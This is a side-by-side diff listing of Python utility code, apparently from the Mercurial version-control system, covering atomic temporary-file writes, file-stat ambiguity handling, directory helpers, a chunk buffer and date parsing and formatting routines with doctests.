1690 try:
1695 try:
1691 return (self.stat.st_ctime == old.stat.st_ctime)
1696 return (self.stat.st_ctime == old.stat.st_ctime)
1692 except AttributeError:
1697 except AttributeError:
1693 return False
1698 return False
1694
1699
1695 def avoidambig(self, path, old):
1700 def avoidambig(self, path, old):
1696 """Change file stat of specified path to avoid ambiguity
1701 """Change file stat of specified path to avoid ambiguity
1697
1702
1698 'old' should be previous filestat of 'path'.
1703 'old' should be previous filestat of 'path'.
1699
1704
1700 This skips avoiding ambiguity, if a process doesn't have
1705 This skips avoiding ambiguity, if a process doesn't have
1701 appropriate privileges for 'path'. This returns False in this
1706 appropriate privileges for 'path'. This returns False in this
1702 case.
1707 case.
1703
1708
1704 Otherwise, this returns True, as "ambiguity is avoided".
1709 Otherwise, this returns True, as "ambiguity is avoided".
1705 """
1710 """
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1711 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 try:
1712 try:
1708 os.utime(path, (advanced, advanced))
1713 os.utime(path, (advanced, advanced))
1709 except OSError as inst:
1714 except OSError as inst:
1710 if inst.errno == errno.EPERM:
1715 if inst.errno == errno.EPERM:
1711 # utime() on the file created by another user causes EPERM,
1716 # utime() on the file created by another user causes EPERM,
1712 # if a process doesn't have appropriate privileges
1717 # if a process doesn't have appropriate privileges
1713 return False
1718 return False
1714 raise
1719 raise
1715 return True
1720 return True
1716
1721
1717 def __ne__(self, other):
1722 def __ne__(self, other):
1718 return not self == other
1723 return not self == other
1719
1724
1720 class atomictempfile(object):
1725 class atomictempfile(object):
1721 '''writable file object that atomically updates a file
1726 '''writable file object that atomically updates a file
1722
1727
1723 All writes will go to a temporary copy of the original file. Call
1728 All writes will go to a temporary copy of the original file. Call
1724 close() when you are done writing, and atomictempfile will rename
1729 close() when you are done writing, and atomictempfile will rename
1725 the temporary copy to the original name, making the changes
1730 the temporary copy to the original name, making the changes
1726 visible. If the object is destroyed without being closed, all your
1731 visible. If the object is destroyed without being closed, all your
1727 writes are discarded.
1732 writes are discarded.
1728
1733
1729 checkambig argument of constructor is used with filestat, and is
1734 checkambig argument of constructor is used with filestat, and is
1730 useful only if target file is guarded by any lock (e.g. repo.lock
1735 useful only if target file is guarded by any lock (e.g. repo.lock
1731 or repo.wlock).
1736 or repo.wlock).
1732 '''
1737 '''
1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1738 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 self.__name = name # permanent name
1739 self.__name = name # permanent name
1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1740 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 createmode=createmode)
1741 createmode=createmode)
1737 self._fp = posixfile(self._tempname, mode)
1742 self._fp = posixfile(self._tempname, mode)
1738 self._checkambig = checkambig
1743 self._checkambig = checkambig
1739
1744
1740 # delegated methods
1745 # delegated methods
1741 self.read = self._fp.read
1746 self.read = self._fp.read
1742 self.write = self._fp.write
1747 self.write = self._fp.write
1743 self.seek = self._fp.seek
1748 self.seek = self._fp.seek
1744 self.tell = self._fp.tell
1749 self.tell = self._fp.tell
1745 self.fileno = self._fp.fileno
1750 self.fileno = self._fp.fileno
1746
1751
1747 def close(self):
1752 def close(self):
1748 if not self._fp.closed:
1753 if not self._fp.closed:
1749 self._fp.close()
1754 self._fp.close()
1750 filename = localpath(self.__name)
1755 filename = localpath(self.__name)
1751 oldstat = self._checkambig and filestat.frompath(filename)
1756 oldstat = self._checkambig and filestat.frompath(filename)
1752 if oldstat and oldstat.stat:
1757 if oldstat and oldstat.stat:
1753 rename(self._tempname, filename)
1758 rename(self._tempname, filename)
1754 newstat = filestat.frompath(filename)
1759 newstat = filestat.frompath(filename)
1755 if newstat.isambig(oldstat):
1760 if newstat.isambig(oldstat):
1756 # stat of changed file is ambiguous to original one
1761 # stat of changed file is ambiguous to original one
1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1762 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 os.utime(filename, (advanced, advanced))
1763 os.utime(filename, (advanced, advanced))
1759 else:
1764 else:
1760 rename(self._tempname, filename)
1765 rename(self._tempname, filename)
1761
1766
1762 def discard(self):
1767 def discard(self):
1763 if not self._fp.closed:
1768 if not self._fp.closed:
1764 try:
1769 try:
1765 os.unlink(self._tempname)
1770 os.unlink(self._tempname)
1766 except OSError:
1771 except OSError:
1767 pass
1772 pass
1768 self._fp.close()
1773 self._fp.close()
1769
1774
1770 def __del__(self):
1775 def __del__(self):
1771 if safehasattr(self, '_fp'): # constructor actually did something
1776 if safehasattr(self, '_fp'): # constructor actually did something
1772 self.discard()
1777 self.discard()
1773
1778
1774 def __enter__(self):
1779 def __enter__(self):
1775 return self
1780 return self
1776
1781
1777 def __exit__(self, exctype, excvalue, traceback):
1782 def __exit__(self, exctype, excvalue, traceback):
1778 if exctype is not None:
1783 if exctype is not None:
1779 self.discard()
1784 self.discard()
1780 else:
1785 else:
1781 self.close()
1786 self.close()
1782
1787
1783 def unlinkpath(f, ignoremissing=False):
1788 def unlinkpath(f, ignoremissing=False):
1784 """unlink and remove the directory if it is empty"""
1789 """unlink and remove the directory if it is empty"""
1785 if ignoremissing:
1790 if ignoremissing:
1786 tryunlink(f)
1791 tryunlink(f)
1787 else:
1792 else:
1788 unlink(f)
1793 unlink(f)
1789 # try removing directories that might now be empty
1794 # try removing directories that might now be empty
1790 try:
1795 try:
1791 removedirs(os.path.dirname(f))
1796 removedirs(os.path.dirname(f))
1792 except OSError:
1797 except OSError:
1793 pass
1798 pass
1794
1799
1795 def tryunlink(f):
1800 def tryunlink(f):
1796 """Attempt to remove a file, ignoring ENOENT errors."""
1801 """Attempt to remove a file, ignoring ENOENT errors."""
1797 try:
1802 try:
1798 unlink(f)
1803 unlink(f)
1799 except OSError as e:
1804 except OSError as e:
1800 if e.errno != errno.ENOENT:
1805 if e.errno != errno.ENOENT:
1801 raise
1806 raise
1802
1807
1803 def makedirs(name, mode=None, notindexed=False):
1808 def makedirs(name, mode=None, notindexed=False):
1804 """recursive directory creation with parent mode inheritance
1809 """recursive directory creation with parent mode inheritance
1805
1810
1806 Newly created directories are marked as "not to be indexed by
1811 Newly created directories are marked as "not to be indexed by
1807 the content indexing service", if ``notindexed`` is specified
1812 the content indexing service", if ``notindexed`` is specified
1808 for "write" mode access.
1813 for "write" mode access.
1809 """
1814 """
1810 try:
1815 try:
1811 makedir(name, notindexed)
1816 makedir(name, notindexed)
1812 except OSError as err:
1817 except OSError as err:
1813 if err.errno == errno.EEXIST:
1818 if err.errno == errno.EEXIST:
1814 return
1819 return
1815 if err.errno != errno.ENOENT or not name:
1820 if err.errno != errno.ENOENT or not name:
1816 raise
1821 raise
1817 parent = os.path.dirname(os.path.abspath(name))
1822 parent = os.path.dirname(os.path.abspath(name))
1818 if parent == name:
1823 if parent == name:
1819 raise
1824 raise
1820 makedirs(parent, mode, notindexed)
1825 makedirs(parent, mode, notindexed)
1821 try:
1826 try:
1822 makedir(name, notindexed)
1827 makedir(name, notindexed)
1823 except OSError as err:
1828 except OSError as err:
1824 # Catch EEXIST to handle races
1829 # Catch EEXIST to handle races
1825 if err.errno == errno.EEXIST:
1830 if err.errno == errno.EEXIST:
1826 return
1831 return
1827 raise
1832 raise
1828 if mode is not None:
1833 if mode is not None:
1829 os.chmod(name, mode)
1834 os.chmod(name, mode)
1830
1835
1831 def readfile(path):
1836 def readfile(path):
1832 with open(path, 'rb') as fp:
1837 with open(path, 'rb') as fp:
1833 return fp.read()
1838 return fp.read()
1834
1839
1835 def writefile(path, text):
1840 def writefile(path, text):
1836 with open(path, 'wb') as fp:
1841 with open(path, 'wb') as fp:
1837 fp.write(text)
1842 fp.write(text)
1838
1843
1839 def appendfile(path, text):
1844 def appendfile(path, text):
1840 with open(path, 'ab') as fp:
1845 with open(path, 'ab') as fp:
1841 fp.write(text)
1846 fp.write(text)
1842
1847
1843 class chunkbuffer(object):
1848 class chunkbuffer(object):
1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1849 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 iterator over chunks of arbitrary size."""
1850 iterator over chunks of arbitrary size."""
1846
1851
1847 def __init__(self, in_iter):
1852 def __init__(self, in_iter):
1848 """in_iter is the iterator that's iterating over the input chunks."""
1853 """in_iter is the iterator that's iterating over the input chunks."""
1849 def splitbig(chunks):
1854 def splitbig(chunks):
1850 for chunk in chunks:
1855 for chunk in chunks:
1851 if len(chunk) > 2**20:
1856 if len(chunk) > 2**20:
1852 pos = 0
1857 pos = 0
1853 while pos < len(chunk):
1858 while pos < len(chunk):
1854 end = pos + 2 ** 18
1859 end = pos + 2 ** 18
1855 yield chunk[pos:end]
1860 yield chunk[pos:end]
1856 pos = end
1861 pos = end
1857 else:
1862 else:
1858 yield chunk
1863 yield chunk
1859 self.iter = splitbig(in_iter)
1864 self.iter = splitbig(in_iter)
1860 self._queue = collections.deque()
1865 self._queue = collections.deque()
1861 self._chunkoffset = 0
1866 self._chunkoffset = 0
1862
1867
1863 def read(self, l=None):
1868 def read(self, l=None):
1864 """Read L bytes of data from the iterator of chunks of data.
1869 """Read L bytes of data from the iterator of chunks of data.
1865 Returns less than L bytes if the iterator runs dry.
1870 Returns less than L bytes if the iterator runs dry.
1866
1871
1867 If size parameter is omitted, read everything"""
1872 If size parameter is omitted, read everything"""
1868 if l is None:
1873 if l is None:
1869 return ''.join(self.iter)
1874 return ''.join(self.iter)
1870
1875
1871 left = l
1876 left = l
1872 buf = []
1877 buf = []
1873 queue = self._queue
1878 queue = self._queue
1874 while left > 0:
1879 while left > 0:
1875 # refill the queue
1880 # refill the queue
1876 if not queue:
1881 if not queue:
1877 target = 2**18
1882 target = 2**18
1878 for chunk in self.iter:
1883 for chunk in self.iter:
1879 queue.append(chunk)
1884 queue.append(chunk)
1880 target -= len(chunk)
1885 target -= len(chunk)
1881 if target <= 0:
1886 if target <= 0:
1882 break
1887 break
1883 if not queue:
1888 if not queue:
1884 break
1889 break
1885
1890
1886 # The easy way to do this would be to queue.popleft(), modify the
1891 # The easy way to do this would be to queue.popleft(), modify the
1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1892 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 # where we read partial chunk content, this incurs 2 dequeue
1893 # where we read partial chunk content, this incurs 2 dequeue
1889 # mutations and creates a new str for the remaining chunk in the
1894 # mutations and creates a new str for the remaining chunk in the
1890 # queue. Our code below avoids this overhead.
1895 # queue. Our code below avoids this overhead.
1891
1896
1892 chunk = queue[0]
1897 chunk = queue[0]
1893 chunkl = len(chunk)
1898 chunkl = len(chunk)
1894 offset = self._chunkoffset
1899 offset = self._chunkoffset
1895
1900
1896 # Use full chunk.
1901 # Use full chunk.
1897 if offset == 0 and left >= chunkl:
1902 if offset == 0 and left >= chunkl:
1898 left -= chunkl
1903 left -= chunkl
1899 queue.popleft()
1904 queue.popleft()
1900 buf.append(chunk)
1905 buf.append(chunk)
1901 # self._chunkoffset remains at 0.
1906 # self._chunkoffset remains at 0.
1902 continue
1907 continue
1903
1908
1904 chunkremaining = chunkl - offset
1909 chunkremaining = chunkl - offset
1905
1910
1906 # Use all of unconsumed part of chunk.
1911 # Use all of unconsumed part of chunk.
1907 if left >= chunkremaining:
1912 if left >= chunkremaining:
1908 left -= chunkremaining
1913 left -= chunkremaining
1909 queue.popleft()
1914 queue.popleft()
1910 # offset == 0 is enabled by block above, so this won't merely
1915 # offset == 0 is enabled by block above, so this won't merely
1911 # copy via ``chunk[0:]``.
1916 # copy via ``chunk[0:]``.
1912 buf.append(chunk[offset:])
1917 buf.append(chunk[offset:])
1913 self._chunkoffset = 0
1918 self._chunkoffset = 0
1914
1919
1915 # Partial chunk needed.
1920 # Partial chunk needed.
1916 else:
1921 else:
1917 buf.append(chunk[offset:offset + left])
1922 buf.append(chunk[offset:offset + left])
1918 self._chunkoffset += left
1923 self._chunkoffset += left
1919 left -= chunkremaining
1924 left -= chunkremaining
1920
1925
1921 return ''.join(buf)
1926 return ''.join(buf)
1922
1927
1923 def filechunkiter(f, size=131072, limit=None):
1928 def filechunkiter(f, size=131072, limit=None):
1924 """Create a generator that produces the data in the file size
1929 """Create a generator that produces the data in the file size
1925 (default 131072) bytes at a time, up to optional limit (default is
1930 (default 131072) bytes at a time, up to optional limit (default is
1926 to read all data). Chunks may be less than size bytes if the
1931 to read all data). Chunks may be less than size bytes if the
1927 chunk is the last chunk in the file, or the file is a socket or
1932 chunk is the last chunk in the file, or the file is a socket or
1928 some other type of file that sometimes reads less data than is
1933 some other type of file that sometimes reads less data than is
1929 requested."""
1934 requested."""
1930 assert size >= 0
1935 assert size >= 0
1931 assert limit is None or limit >= 0
1936 assert limit is None or limit >= 0
1932 while True:
1937 while True:
1933 if limit is None:
1938 if limit is None:
1934 nbytes = size
1939 nbytes = size
1935 else:
1940 else:
1936 nbytes = min(limit, size)
1941 nbytes = min(limit, size)
1937 s = nbytes and f.read(nbytes)
1942 s = nbytes and f.read(nbytes)
1938 if not s:
1943 if not s:
1939 break
1944 break
1940 if limit:
1945 if limit:
1941 limit -= len(s)
1946 limit -= len(s)
1942 yield s
1947 yield s
1943
1948
1944 def makedate(timestamp=None):
1949 def makedate(timestamp=None):
1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1950 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 offset) tuple based off the local timezone.'''
1951 offset) tuple based off the local timezone.'''
1947 if timestamp is None:
1952 if timestamp is None:
1948 timestamp = time.time()
1953 timestamp = time.time()
1949 if timestamp < 0:
1954 if timestamp < 0:
1950 hint = _("check your clock")
1955 hint = _("check your clock")
1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1956 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1957 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 datetime.datetime.fromtimestamp(timestamp))
1958 datetime.datetime.fromtimestamp(timestamp))
1954 tz = delta.days * 86400 + delta.seconds
1959 tz = delta.days * 86400 + delta.seconds
1955 return timestamp, tz
1960 return timestamp, tz
1956
1961
1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1962 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 """represent a (unixtime, offset) tuple as a localized time.
1963 """represent a (unixtime, offset) tuple as a localized time.
1959 unixtime is seconds since the epoch, and offset is the time zone's
1964 unixtime is seconds since the epoch, and offset is the time zone's
1960 number of seconds away from UTC.
1965 number of seconds away from UTC.
1961
1966
1962 >>> datestr((0, 0))
1967 >>> datestr((0, 0))
1963 'Thu Jan 01 00:00:00 1970 +0000'
1968 'Thu Jan 01 00:00:00 1970 +0000'
1964 >>> datestr((42, 0))
1969 >>> datestr((42, 0))
1965 'Thu Jan 01 00:00:42 1970 +0000'
1970 'Thu Jan 01 00:00:42 1970 +0000'
1966 >>> datestr((-42, 0))
1971 >>> datestr((-42, 0))
1967 'Wed Dec 31 23:59:18 1969 +0000'
1972 'Wed Dec 31 23:59:18 1969 +0000'
1968 >>> datestr((0x7fffffff, 0))
1973 >>> datestr((0x7fffffff, 0))
1969 'Tue Jan 19 03:14:07 2038 +0000'
1974 'Tue Jan 19 03:14:07 2038 +0000'
1970 >>> datestr((-0x80000000, 0))
1975 >>> datestr((-0x80000000, 0))
1971 'Fri Dec 13 20:45:52 1901 +0000'
1976 'Fri Dec 13 20:45:52 1901 +0000'
1972 """
1977 """
1973 t, tz = date or makedate()
1978 t, tz = date or makedate()
1974 if "%1" in format or "%2" in format or "%z" in format:
1979 if "%1" in format or "%2" in format or "%z" in format:
1975 sign = (tz > 0) and "-" or "+"
1980 sign = (tz > 0) and "-" or "+"
1976 minutes = abs(tz) // 60
1981 minutes = abs(tz) // 60
1977 q, r = divmod(minutes, 60)
1982 q, r = divmod(minutes, 60)
1978 format = format.replace("%z", "%1%2")
1983 format = format.replace("%z", "%1%2")
1979 format = format.replace("%1", "%c%02d" % (sign, q))
1984 format = format.replace("%1", "%c%02d" % (sign, q))
1980 format = format.replace("%2", "%02d" % r)
1985 format = format.replace("%2", "%02d" % r)
1981 d = t - tz
1986 d = t - tz
1982 if d > 0x7fffffff:
1987 if d > 0x7fffffff:
1983 d = 0x7fffffff
1988 d = 0x7fffffff
1984 elif d < -0x80000000:
1989 elif d < -0x80000000:
1985 d = -0x80000000
1990 d = -0x80000000
1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1991 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 # because they use the gmtime() system call which is buggy on Windows
1992 # because they use the gmtime() system call which is buggy on Windows
1988 # for negative values.
1993 # for negative values.
1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1994 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1995 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 return s
1996 return s
1992
1997
1993 def shortdate(date=None):
1998 def shortdate(date=None):
1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1999 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 return datestr(date, format='%Y-%m-%d')
2000 return datestr(date, format='%Y-%m-%d')
1996
2001
1997 def parsetimezone(s):
2002 def parsetimezone(s):
1998 """find a trailing timezone, if any, in string, and return a
2003 """find a trailing timezone, if any, in string, and return a
1999 (offset, remainder) pair"""
2004 (offset, remainder) pair"""
2000
2005
2001 if s.endswith("GMT") or s.endswith("UTC"):
2006 if s.endswith("GMT") or s.endswith("UTC"):
2002 return 0, s[:-3].rstrip()
2007 return 0, s[:-3].rstrip()
2003
2008
2004 # Unix-style timezones [+-]hhmm
2009 # Unix-style timezones [+-]hhmm
2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2010 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 sign = (s[-5] == "+") and 1 or -1
2011 sign = (s[-5] == "+") and 1 or -1
2007 hours = int(s[-4:-2])
2012 hours = int(s[-4:-2])
2008 minutes = int(s[-2:])
2013 minutes = int(s[-2:])
2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2014 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010
2015
2011 # ISO8601 trailing Z
2016 # ISO8601 trailing Z
2012 if s.endswith("Z") and s[-2:-1].isdigit():
2017 if s.endswith("Z") and s[-2:-1].isdigit():
2013 return 0, s[:-1]
2018 return 0, s[:-1]
2014
2019
2015 # ISO8601-style [+-]hh:mm
2020 # ISO8601-style [+-]hh:mm
2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2021 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2022 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 sign = (s[-6] == "+") and 1 or -1
2023 sign = (s[-6] == "+") and 1 or -1
2019 hours = int(s[-5:-3])
2024 hours = int(s[-5:-3])
2020 minutes = int(s[-2:])
2025 minutes = int(s[-2:])
2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2026 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022
2027
2023 return None, s
2028 return None, s
2024
2029
2025 def strdate(string, format, defaults=None):
2030 def strdate(string, format, defaults=None):
2026 """parse a localized time string and return a (unixtime, offset) tuple.
2031 """parse a localized time string and return a (unixtime, offset) tuple.
2027 if the string cannot be parsed, ValueError is raised."""
2032 if the string cannot be parsed, ValueError is raised."""
2028 if defaults is None:
2033 if defaults is None:
2029 defaults = {}
2034 defaults = {}
2030
2035
2031 # NOTE: unixtime = localunixtime + offset
2036 # NOTE: unixtime = localunixtime + offset
2032 offset, date = parsetimezone(string)
2037 offset, date = parsetimezone(string)
2033
2038
2034 # add missing elements from defaults
2039 # add missing elements from defaults
2035 usenow = False # default to using biased defaults
2040 usenow = False # default to using biased defaults
2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2041 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 part = pycompat.bytestr(part)
2042 part = pycompat.bytestr(part)
2038 found = [True for p in part if ("%"+p) in format]
2043 found = [True for p in part if ("%"+p) in format]
2039 if not found:
2044 if not found:
2040 date += "@" + defaults[part][usenow]
2045 date += "@" + defaults[part][usenow]
2041 format += "@%" + part[0]
2046 format += "@%" + part[0]
2042 else:
2047 else:
2043 # We've found a specific time element, less specific time
2048 # We've found a specific time element, less specific time
2044 # elements are relative to today
2049 # elements are relative to today
2045 usenow = True
2050 usenow = True
2046
2051
2047 timetuple = time.strptime(encoding.strfromlocal(date),
2052 timetuple = time.strptime(encoding.strfromlocal(date),
2048 encoding.strfromlocal(format))
2053 encoding.strfromlocal(format))
2049 localunixtime = int(calendar.timegm(timetuple))
2054 localunixtime = int(calendar.timegm(timetuple))
2050 if offset is None:
2055 if offset is None:
2051 # local timezone
2056 # local timezone
2052 unixtime = int(time.mktime(timetuple))
2057 unixtime = int(time.mktime(timetuple))
2053 offset = unixtime - localunixtime
2058 offset = unixtime - localunixtime
2054 else:
2059 else:
2055 unixtime = localunixtime + offset
2060 unixtime = localunixtime + offset
2056 return unixtime, offset
2061 return unixtime, offset
2057
2062
2058 def parsedate(date, formats=None, bias=None):
2063 def parsedate(date, formats=None, bias=None):
2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2064 """parse a localized date/time and return a (unixtime, offset) tuple.
2060
2065
2061 The date may be a "unixtime offset" string or in one of the specified
2066 The date may be a "unixtime offset" string or in one of the specified
2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2067 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063
2068
2064 >>> parsedate(b' today ') == parsedate(
2069 >>> parsedate(b' today ') == parsedate(
2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2070 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 True
2071 True
2067 >>> parsedate(b'yesterday ') == parsedate(
2072 >>> parsedate(b'yesterday ') == parsedate(
2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2073 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 ... ).strftime('%b %d').encode('ascii'))
2074 ... ).strftime('%b %d').encode('ascii'))
2070 True
2075 True
2071 >>> now, tz = makedate()
2076 >>> now, tz = makedate()
2072 >>> strnow, strtz = parsedate(b'now')
2077 >>> strnow, strtz = parsedate(b'now')
2073 >>> (strnow - now) < 1
2078 >>> (strnow - now) < 1
2074 True
2079 True
2075 >>> tz == strtz
2080 >>> tz == strtz
2076 True
2081 True
2077 """
2082 """
2078 if bias is None:
2083 if bias is None:
2079 bias = {}
2084 bias = {}
2080 if not date:
2085 if not date:
2081 return 0, 0
2086 return 0, 0
2082 if isinstance(date, tuple) and len(date) == 2:
2087 if isinstance(date, tuple) and len(date) == 2:
2083 return date
2088 return date
2084 if not formats:
2089 if not formats:
2085 formats = defaultdateformats
2090 formats = defaultdateformats
2086 date = date.strip()
2091 date = date.strip()
2087
2092
2088 if date == 'now' or date == _('now'):
2093 if date == 'now' or date == _('now'):
2089 return makedate()
2094 return makedate()
2090 if date == 'today' or date == _('today'):
2095 if date == 'today' or date == _('today'):
2091 date = datetime.date.today().strftime(r'%b %d')
2096 date = datetime.date.today().strftime(r'%b %d')
2092 date = encoding.strtolocal(date)
2097 date = encoding.strtolocal(date)
2093 elif date == 'yesterday' or date == _('yesterday'):
2098 elif date == 'yesterday' or date == _('yesterday'):
2094 date = (datetime.date.today() -
2099 date = (datetime.date.today() -
2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2100 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 date = encoding.strtolocal(date)
2101 date = encoding.strtolocal(date)
2097
2102
2098 try:
2103 try:
2099 when, offset = map(int, date.split(' '))
2104 when, offset = map(int, date.split(' '))
2100 except ValueError:
2105 except ValueError:
2101 # fill out defaults
2106 # fill out defaults
2102 now = makedate()
2107 now = makedate()
2103 defaults = {}
2108 defaults = {}
2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2109 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 # this piece is for rounding the specific end of unknowns
2110 # this piece is for rounding the specific end of unknowns
2106 b = bias.get(part)
2111 b = bias.get(part)
2107 if b is None:
2112 if b is None:
2108 if part[0:1] in "HMS":
2113 if part[0:1] in "HMS":
2109 b = "00"
2114 b = "00"
2110 else:
2115 else:
2111 b = "0"
2116 b = "0"
2112
2117
2113 # this piece is for matching the generic end to today's date
2118 # this piece is for matching the generic end to today's date
2114 n = datestr(now, "%" + part[0:1])
2119 n = datestr(now, "%" + part[0:1])
2115
2120
2116 defaults[part] = (b, n)
2121 defaults[part] = (b, n)
2117
2122
2118 for format in formats:
2123 for format in formats:
2119 try:
2124 try:
2120 when, offset = strdate(date, format, defaults)
2125 when, offset = strdate(date, format, defaults)
2121 except (ValueError, OverflowError):
2126 except (ValueError, OverflowError):
2122 pass
2127 pass
2123 else:
2128 else:
2124 break
2129 break
2125 else:
2130 else:
2126 raise error.ParseError(_('invalid date: %r') % date)
2131 raise error.ParseError(_('invalid date: %r') % date)
2127 # validate explicit (probably user-specified) date and
2132 # validate explicit (probably user-specified) date and
2128 # time zone offset. values must fit in signed 32 bits for
2133 # time zone offset. values must fit in signed 32 bits for
2129 # current 32-bit linux runtimes. timezones go from UTC-12
2134 # current 32-bit linux runtimes. timezones go from UTC-12
2130 # to UTC+14
2135 # to UTC+14
2131 if when < -0x80000000 or when > 0x7fffffff:
2136 if when < -0x80000000 or when > 0x7fffffff:
2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2137 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 if offset < -50400 or offset > 43200:
2138 if offset < -50400 or offset > 43200:
2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2139 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 return when, offset
2140 return when, offset
2136
2141
2137 def matchdate(date):
2142 def matchdate(date):
2138 """Return a function that matches a given date match specifier
2143 """Return a function that matches a given date match specifier
2139
2144
2140 Formats include:
2145 Formats include:
2141
2146
2142 '{date}' match a given date to the accuracy provided
2147 '{date}' match a given date to the accuracy provided
2143
2148
2144 '<{date}' on or before a given date
2149 '<{date}' on or before a given date
2145
2150
2146 '>{date}' on or after a given date
2151 '>{date}' on or after a given date
2147
2152
2148 >>> p1 = parsedate(b"10:29:59")
2153 >>> p1 = parsedate(b"10:29:59")
2149 >>> p2 = parsedate(b"10:30:00")
2154 >>> p2 = parsedate(b"10:30:00")
2150 >>> p3 = parsedate(b"10:30:59")
2155 >>> p3 = parsedate(b"10:30:59")
2151 >>> p4 = parsedate(b"10:31:00")
2156 >>> p4 = parsedate(b"10:31:00")
2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2157 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 >>> f = matchdate(b"10:30")
2158 >>> f = matchdate(b"10:30")
2154 >>> f(p1[0])
2159 >>> f(p1[0])
2155 False
2160 False
2156 >>> f(p2[0])
2161 >>> f(p2[0])
2157 True
2162 True
2158 >>> f(p3[0])
2163 >>> f(p3[0])
2159 True
2164 True
2160 >>> f(p4[0])
2165 >>> f(p4[0])
2161 False
2166 False
2162 >>> f(p5[0])
2167 >>> f(p5[0])
2163 False
2168 False
2164 """
2169 """
2165
2170
2166 def lower(date):
2171 def lower(date):
2167 d = {'mb': "1", 'd': "1"}
2172 d = {'mb': "1", 'd': "1"}
2168 return parsedate(date, extendeddateformats, d)[0]
2173 return parsedate(date, extendeddateformats, d)[0]
2169
2174
2170 def upper(date):
2175 def upper(date):
2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2176 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 for days in ("31", "30", "29"):
2177 for days in ("31", "30", "29"):
2173 try:
2178 try:
2174 d["d"] = days
2179 d["d"] = days
2175 return parsedate(date, extendeddateformats, d)[0]
2180 return parsedate(date, extendeddateformats, d)[0]
2176 except Abort:
2181 except Abort:
2177 pass
2182 pass
2178 d["d"] = "28"
2183 d["d"] = "28"
2179 return parsedate(date, extendeddateformats, d)[0]
2184 return parsedate(date, extendeddateformats, d)[0]
2180
2185
2181 date = date.strip()
2186 date = date.strip()
2182
2187
2183 if not date:
2188 if not date:
2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2189 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 elif date[0] == "<":
2190 elif date[0] == "<":
2186 if not date[1:]:
2191 if not date[1:]:
2187 raise Abort(_("invalid day spec, use '<DATE'"))
2192 raise Abort(_("invalid day spec, use '<DATE'"))
2188 when = upper(date[1:])
2193 when = upper(date[1:])
2189 return lambda x: x <= when
2194 return lambda x: x <= when
2190 elif date[0] == ">":
2195 elif date[0] == ">":
2191 if not date[1:]:
2196 if not date[1:]:
2192 raise Abort(_("invalid day spec, use '>DATE'"))
2197 raise Abort(_("invalid day spec, use '>DATE'"))
2193 when = lower(date[1:])
2198 when = lower(date[1:])
2194 return lambda x: x >= when
2199 return lambda x: x >= when
2195 elif date[0] == "-":
2200 elif date[0] == "-":
2196 try:
2201 try:
2197 days = int(date[1:])
2202 days = int(date[1:])
2198 except ValueError:
2203 except ValueError:
2199 raise Abort(_("invalid day spec: %s") % date[1:])
2204 raise Abort(_("invalid day spec: %s") % date[1:])
2200 if days < 0:
2205 if days < 0:
2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2206 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
